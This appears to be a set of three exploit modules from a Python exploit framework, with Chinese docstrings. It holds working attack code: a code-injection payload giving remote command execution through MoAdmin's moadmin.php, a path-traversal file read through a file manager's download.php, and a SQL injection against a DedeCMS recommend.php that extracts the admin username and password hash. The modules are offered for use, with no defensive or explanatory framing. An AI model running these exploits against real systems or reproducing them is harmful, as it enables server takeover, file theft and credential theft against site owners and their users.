def exploit(self): ''' 漏洞利用的核心代码, 在此函数中完成漏洞利用 ''' Log.Log.info("Lauching the exploition...") host = self.get_config("remote_host") port = int(self.get_config("remote_port")) path = self.get_config("path") command = self.get_config("command") url = "http://%s:%d/%s/moadmin.php?collection=1" % (host, port, path) data = { "object": "1;system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) } Log.Log.info("Url: %s" % (url)) Log.Log.info("Data: %s" % (data)) try: response = requests.post(url, data=data) if response.status_code == 200: Log.Log.success("Exploit success!") print("%s" % (color.blue(response.content))) return True else: return False except Exception as e: Log.Log.error(str(e)) return False
def exploit(self): ''' 漏洞利用的核心代码, 在此函数中完成漏洞利用 ''' host = self.get_config("remote_host") port = self.get_config("remote_port") file = self.get_config("file") if not self.login(): Log.Log.error("Login failed!") return False Log.Log.success("Login successful!") url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % ( host, port, file) try: response = self.session.get(url) if response.status_code == 200: Log.Log.success("Exploit success!") Log.Log.info(">>>>>> %s <<<<<<" % (file)) print("%s" % color.blue(response.content)) return True else: return False except Exception as e: Log.Log.error(str(e)) return False
def exploit(self): ''' 漏洞利用的核心代码, 在此函数中完成漏洞利用 ''' Log.info("Lauching the exploition...") host = self.get_config("remote_host") port = self.get_config("remote_port") url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''') Log.info("Url: %s" % (url)) try: response = requests.get(url) if response.status_code == 200: content = response.content if "<h2>" not in content: Log.error("Exploit Failed!") return False data = response.content.split("<h2>")[1].split("</h2>")[0].split("\\|") if len(data) != 2: Log.error("Exploit Failed!") return False Log.success("Exploit success!") username = data[0] password = data[1] print "%s" % (color.cyan("Username\tHash")) print "%s" % (color.blue("%s\t%s" % (username, password))) return True else: return False except Exception as e: Log.error(str(e)) return False